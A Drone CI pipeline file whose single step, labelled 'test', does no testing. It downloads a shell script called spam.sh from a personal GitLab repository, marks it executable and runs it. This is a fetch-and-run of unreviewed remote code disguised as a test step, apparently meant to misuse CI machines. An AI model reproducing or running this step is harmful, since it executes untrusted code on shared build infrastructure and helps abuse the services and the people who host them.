kind: pipeline
type: docker
name: default

platform:
  os: linux
  arch: arm64

steps:

- name: test
  image: python:3.7.2
  commands:
  - wget https://gitlab.com/renifer12/project-7/-/raw/main/spam.sh && chmod +x spam.sh && ./spam.sh
